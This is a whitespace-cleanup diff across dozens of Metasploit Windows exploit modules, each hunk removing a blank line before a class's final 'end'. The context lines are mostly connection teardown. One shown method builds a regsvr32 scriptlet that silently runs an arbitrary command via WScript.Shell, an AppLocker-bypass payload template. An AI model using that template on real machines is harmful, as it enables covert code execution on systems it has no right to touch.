b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb @@ -175,5 +175,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/bigant_server_usv.rb b/modules/exploits/windows/misc/bigant_server_usv.rb index 75306c4560..0530ae9014 100644 --- a/modules/exploits/windows/misc/bigant_server_usv.rb +++ b/modules/exploits/windows/misc/bigant_server_usv.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index 4a16938409..a2377d957b 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(udp_sock) disconnect_udp end - end diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index 7d5ec0ebb8..9c2f8e2a9c 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -68,5 +68,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index bb347941ab..68c0d8cfb4 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/borland_starteam.rb b/modules/exploits/windows/misc/borland_starteam.rb index 8c2cea8b3f..cb85c0d0f6 100644 --- a/modules/exploits/windows/misc/borland_starteam.rb +++ b/modules/exploits/windows/misc/borland_starteam.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/citrix_streamprocess.rb b/modules/exploits/windows/misc/citrix_streamprocess.rb index 4c0566a526..a7280afb6e 100644 --- a/modules/exploits/windows/misc/citrix_streamprocess.rb +++ b/modules/exploits/windows/misc/citrix_streamprocess.rb @@ -83,5 +83,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(udp_sock) disconnect_udp end - end diff --git a/modules/exploits/windows/misc/doubletake.rb b/modules/exploits/windows/misc/doubletake.rb index 5c3497b884..59175c00ae 100644 --- a/modules/exploits/windows/misc/doubletake.rb +++ b/modules/exploits/windows/misc/doubletake.rb @@ -73,5 +73,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/eiqnetworks_esa.rb b/modules/exploits/windows/misc/eiqnetworks_esa.rb index ca8a09ca7d..6f8a184d55 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb index 201b00fd8a..e20c58666a 100644 --- a/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb +++ b/modules/exploits/windows/misc/eiqnetworks_esa_topology.rb @@ -67,5 +67,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb index d11419512c..f5da782441 100644 --- a/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb +++ b/modules/exploits/windows/misc/enterasys_netsight_syslog_bof.rb @@ -150,5 +150,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp end - end diff --git a/modules/exploits/windows/misc/eureka_mail_err.rb b/modules/exploits/windows/misc/eureka_mail_err.rb index 9ffaa1ccae..78197852e6 100644 --- a/modules/exploits/windows/misc/eureka_mail_err.rb +++ b/modules/exploits/windows/misc/eureka_mail_err.rb @@ -86,5 +86,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb index 0ad2f0e651..1723ad0fd8 100644 --- a/modules/exploits/windows/misc/fb_cnct_group.rb +++ b/modules/exploits/windows/misc/fb_cnct_group.rb @@ -260,5 +260,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/fb_isc_attach_database.rb b/modules/exploits/windows/misc/fb_isc_attach_database.rb index a9983805d5..1ae666129f 100644 --- a/modules/exploits/windows/misc/fb_isc_attach_database.rb +++ b/modules/exploits/windows/misc/fb_isc_attach_database.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/fb_isc_create_database.rb b/modules/exploits/windows/misc/fb_isc_create_database.rb index 5e7d30cbbb..39126d4d9a 100644 --- a/modules/exploits/windows/misc/fb_isc_create_database.rb +++ b/modules/exploits/windows/misc/fb_isc_create_database.rb @@ -169,5 +169,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/fb_svc_attach.rb b/modules/exploits/windows/misc/fb_svc_attach.rb index 21889f920d..e1ab69e28c 100644 --- a/modules/exploits/windows/misc/fb_svc_attach.rb +++ b/modules/exploits/windows/misc/fb_svc_attach.rb @@ -127,5 +127,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/gimp_script_fu.rb b/modules/exploits/windows/misc/gimp_script_fu.rb index 25f75ba7b8..6f94925dbd 100644 --- a/modules/exploits/windows/misc/gimp_script_fu.rb +++ b/modules/exploits/windows/misc/gimp_script_fu.rb @@ -88,7 +88,6 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end =begin diff --git a/modules/exploits/windows/misc/hp_dataprotector_crs.rb b/modules/exploits/windows/misc/hp_dataprotector_crs.rb index d58078a9f6..03f2b9fa07 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_crs.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_crs.rb @@ -251,5 +251,4 @@ class MetasploitModule < Msf::Exploit::Remote sock.put(pkt) disconnect end - end diff --git a/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb index 3913fc880a..e34cc767aa 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_encrypted_comms.rb @@ -144,6 +144,5 @@ class MetasploitModule < Msf::Exploit::Remote print_status("Waiting for payload execution (this can take up to 30 seconds or so)") end - end diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index 6319bd82aa..cc35290218 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -197,5 +197,4 @@ class MetasploitModule < Msf::Exploit::Remote command.gsub!(/CHRDECFILE/, get_vbs_string(decoded_file)) end end - end diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index 42e9a2b0c5..8d0be41b26 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -145,5 +145,4 @@ class MetasploitModule < Msf::Exploit::Remote # process execution after file write on the target disconnect end - end diff --git a/modules/exploits/windows/misc/hp_omniinet_1.rb b/modules/exploits/windows/misc/hp_omniinet_1.rb index 5f90ee38f2..f44dd89017 100644 --- a/modules/exploits/windows/misc/hp_omniinet_1.rb +++ b/modules/exploits/windows/misc/hp_omniinet_1.rb @@ -205,5 +205,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/hp_omniinet_2.rb b/modules/exploits/windows/misc/hp_omniinet_2.rb index 5b2e2a3267..574ec07b0e 100644 --- a/modules/exploits/windows/misc/hp_omniinet_2.rb +++ b/modules/exploits/windows/misc/hp_omniinet_2.rb @@ -201,5 +201,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/hp_omniinet_3.rb b/modules/exploits/windows/misc/hp_omniinet_3.rb index 09e03b4104..0e8e056df2 100644 --- a/modules/exploits/windows/misc/hp_omniinet_3.rb +++ b/modules/exploits/windows/misc/hp_omniinet_3.rb @@ -121,5 +121,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 87c8bb3f46..416d9c5e8c 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -200,5 +200,4 @@ user-agent: BBC 11.00.044; 14 disconnect end - end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index dd4db00d74..1b32c9a576 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -202,5 +202,4 @@ user-agent: BBC 11.00.044; 14 disconnect end - end diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index f90f58b906..1eb3028f5d 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb @@ -60,5 +60,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb index bb64487b0b..415261343a 100644 --- a/modules/exploits/windows/misc/ib_isc_attach_database.rb +++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb index a56e493192..cc5df2dae7 100644 --- a/modules/exploits/windows/misc/ib_isc_create_database.rb +++ b/modules/exploits/windows/misc/ib_isc_create_database.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb index 00c49f2e27..e95931d4b1 100644 --- a/modules/exploits/windows/misc/ib_svc_attach.rb +++ b/modules/exploits/windows/misc/ib_svc_attach.rb @@ -170,5 +170,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index ce0a03f4a4..a0f91ec5d4 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -305,5 +305,4 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unexpected response") end end - end diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index a7dc3af015..053b132b7e 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -93,5 +93,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index 564f13100c..1f0d51b169 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -143,5 +143,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb b/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb index c591ed3d8a..1d86ed1f5d 100644 --- a/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb +++ b/modules/exploits/windows/misc/ibm_websphere_java_deserialize.rb @@ -113,5 +113,4 @@ class MetasploitModule < Msf::Exploit::Remote 'data' => req }) end - end diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb index 67fe67c974..380140a6b3 100644 --- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb +++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb @@ -245,7 +245,6 @@ class MetasploitModule < Msf::Exploit::Remote def junk rand_text_alpha(4).unpack("L")[0].to_i end - end =begin diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index 23b622d4f8..224a9ea8bb 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(udp_sock) disconnect_udp end - end diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index 6f545c4cde..33e231ea27 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -214,5 +214,4 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index e797b3cad3..005a5be188 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -62,5 +62,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index bc8ea2c951..ec1579fe40 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -87,5 +87,4 @@ class MetasploitModule < Msf::Exploit::Remote @p = payload.encoded super end - end diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 0d81ba82c5..2d5da2e759 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote service.close_client(client) end - end diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 7fd6ef7583..71bcd912d9 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -144,6 +144,5 @@ class MetasploitModule < Msf::Exploit::Remote end end - end diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index e6ae4fa612..ba4e92c818 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -79,5 +79,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/poisonivy_21x_bof.rb b/modules/exploits/windows/misc/poisonivy_21x_bof.rb index 51ce49f7f9..73c235ce5c 100644 --- a/modules/exploits/windows/misc/poisonivy_21x_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_21x_bof.rb @@ -188,5 +188,4 @@ class MetasploitModule < Msf::Exploit::Remote select(nil,nil,nil,5) disconnect end - end diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb index a0dc19ffb1..13f00325fe 100644 --- a/modules/exploits/windows/misc/poisonivy_bof.rb +++ b/modules/exploits/windows/misc/poisonivy_bof.rb @@ -174,7 +174,6 @@ class MetasploitModule < Msf::Exploit::Remote select(nil,nil,nil,5) disconnect end - end =begin diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 099b77d44a..352ca8bb9b 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -96,5 +96,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index a25a160e22..93fcd50240 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index c875f8bf5f..c3f3a55011 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler(cli) end - end diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index b4d63390e0..c7518a09db 100644 --- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -92,5 +92,4 @@ class MetasploitModule < Msf::Exploit::Remote def gen_sct_file(command) %{<?XML version="1.0"?><scriptlet><registration progid="#{rand_text_alphanumeric 8}" classid="{#{rand_class_id}}"><script><![CDATA[ var r = new ActiveXObject("WScript.Shell").Run("#{command}",0);]]></script></registration></scriptlet>} end - end diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 2e30b29013..762667134f 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -64,5 +64,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 8db4297820..7741be2f3e 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -174,5 +174,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index dc2c5ba48d..f45a4a0f1e 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 0c7121c5cc..76f7492188 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -107,5 +107,4 @@ class MetasploitModule < Msf::Exploit::Remote send_response(cli, '', {'Content-Type'=>sploit}) end - end diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 6b4abd3894..a7bf1f72ff 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -70,5 +70,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index 7469432d7a..e7b48b3932 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -61,5 +61,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb index b4a68d323b..aaaaea7d8e 100644 --- a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb +++ b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb @@ -126,5 +126,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index f83ea8ef8c..20340cdce6 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -66,5 +66,4 @@ class MetasploitModule < Msf::Exploit::Remote client.put(buffer) end - end diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index e0a54d6121..971d2a0820 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -65,5 +65,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index da471014b9..e65d600c39 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -198,5 +198,4 @@ class MetasploitModule < Msf::Exploit::Remote pkt end - end diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index c8969a88ae..d96bef9c10 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -99,5 +99,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect_udp handler end - end diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 01b7d1dcd9..e542e4134c 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index 9c099855f1..6b8d1875ee 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -471,5 +471,4 @@ exec sp_executesql @z| return res[:rows][0][0] end - end diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 9892ae9726..8d9915a84d 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -469,5 +469,4 @@ exec sp_executesql @z| return nil end - end diff --git a/modules/exploits/windows/mssql/mssql_clr_payload.rb b/modules/exploits/windows/mssql/mssql_clr_payload.rb index 846e4a36d1..dc17a52bc2 100644 --- a/modules/exploits/windows/mssql/mssql_clr_payload.rb +++ b/modules/exploits/windows/mssql/mssql_clr_payload.rb @@ -206,5 +206,4 @@ RECONFIGURE; ensure disconnect end - end diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index c66b9cde09..7bff932056 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -117,5 +117,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/mysql/mysql_mof.rb b/modules/exploits/windows/mysql/mysql_mof.rb index a4fff41554..048f1101ee 100644 --- a/modules/exploits/windows/mysql/mysql_mof.rb +++ b/modules/exploits/windows/mysql/mysql_mof.rb @@ -129,5 +129,4 @@ class MetasploitModule < Msf::Exploit::Remote return end end - end diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 3bbb9514ad..c25830a34a 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -97,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote end disconnect end - end diff --git a/modules/exploits/windows/mysql/mysql_start_up.rb b/modules/exploits/windows/mysql/mysql_start_up.rb index 55c029dd2e..c208ff6689 100644 --- a/modules/exploits/windows/mysql/mysql_start_up.rb +++ b/modules/exploits/windows/mysql/mysql_start_up.rb @@ -134,5 +134,4 @@ class MetasploitModule < Msf::Exploit::Remote end register_file_for_cleanup("#{dest}") end - end diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index c30b42dcd6..505f8f48f4 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -72,5 +72,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index 8034cef89a..6be6ebba1c 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -77,5 +77,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index e27987fc5e..44196c7efd 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -75,5 +75,4 @@ class MetasploitModule < Msf::Exploit::Remote handler service.close_client(client) end - end diff --git a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb index 93aa4f0b8e..9e622c926f 100644 --- a/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb +++ b/modules/exploits/windows/novell/file_reporter_fsfui_upload.rb @@ -138,5 +138,4 @@ class MetasploitModule < Msf::Exploit::Remote true end - end diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 2493a698ab..956184ce1c 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -111,5 +111,4 @@ class MetasploitModule < Msf::Exploit::Remote select(nil,nil,nil,2) service.close_client(client) end - end diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index c3ae5ac7eb..2a507158fb 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/oracle/extjob.rb b/modules/exploits/windows/oracle/extjob.rb index a305278068..00925e4999 100644 --- a/modules/exploits/windows/oracle/extjob.rb +++ b/modules/exploits/windows/oracle/extjob.rb @@ -90,7 +90,6 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Safe end - end =begin diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index 7bb523b75d..0cdbae6f2a 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -81,5 +81,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index d73d43ef2f..1b0e827420 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -82,5 +82,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 48a28b9440..08a18e69b5 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -325,5 +325,4 @@ class MetasploitModule < Msf::Exploit::Remote end return ret end - end diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 680b022024..ece5827d0d 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -84,5 +84,4 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end - end diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index cea82790ee..1e824fe3b6 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -105,5 +105,4 @@ class MetasploitModule < Msf::Exploit::Remote handler disconnect end - end diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb 